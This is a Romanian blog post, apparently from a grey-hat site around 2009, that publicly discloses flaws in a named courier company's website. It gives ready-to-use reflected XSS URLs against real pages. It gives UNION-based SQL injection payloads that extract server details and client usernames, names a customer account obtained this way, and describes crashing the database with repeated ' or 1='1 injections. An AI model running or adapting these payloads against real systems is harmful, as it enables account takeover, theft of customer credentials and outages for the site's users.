In timp ce verificam ceva informatii despre o livrare pe care o asteptam cu nerabdare, am vazut ca siteul celor de la Fan Courier Express sta cam prost la partea de securitate a site-ului.

XSS-uri prin care se poate obtine acces in contul altui client (serviciul Client Tracking):

- http://www.fancourier.ro/comanda_online.php?xbutton=Go&xpas=1&xnume_expedit1=’%3E%3Cscript%3Ealert(/Tocsixu%20@%20hackersblog.org/)%3C/script%3E
- http://www.fancourier.ro/awb.php?xawb=1′%20–%20%3Cscript%3Ealert(/Tocsixu%20@%20hackersblog.org/)%3C/script%3E

SQL Injection in campurile AWB si Factura de la “Urmarire expeditie” si in form-ul de cautare oras in vederea obtinerii unor informatii legate de serverul SQL si totodata lista cu usere si parole a tuturor clientilor siteului:

lol' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT_WS(0x3C62723E,Version(),Database(),User()),13 FROM dual -- :

lol' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,username,13 FROM client LIMIT 1,1 -- : Listarea clientilor valabili pentru aplicatia Client Tracking… dupa cum vedem in imaginea de jos unul dintre usere e 1Iunie (aparent al firmei 1 IUNIE SA TIMISOARA). Parola userului se poate obtine la fel de usor. Dupa logare, se ajunge in panoul de client tracking

O alta problema cu care se confrunta site-ul poate permite oricarui utilizator sa blocheze accesul tuturor userilor la site “omorand” serverul SQL cu cateva query-uri (folosindu-se de SQL Injection) care il tin supraincarcat pana acesta cedeaza. Daca in casuta pentru AWB sau Factura in pagina “Urmarire Expeditie” se introduce o valoare de genul ' or 1='1 si se efectueaza ~15+ requesturi de genul (Apasarea consecutiva a butonului GO) se va intampla ce am spus adineauri:

Related Posts

• January 24, 2009 -- Asa chiar nu e voie – mydomain.myx.net
• December 8, 2008 -- Yahoo.com SQL Injection, XSS [se intampla si la case mari]
• November 29, 2008 -- Pcfarm.ro, SQL Injection, XSS
• November 19, 2008 -- Carrefour.ro Local File Disclosure, SQL Injection, XSS
• November 18, 2008 -- Asebuss.ro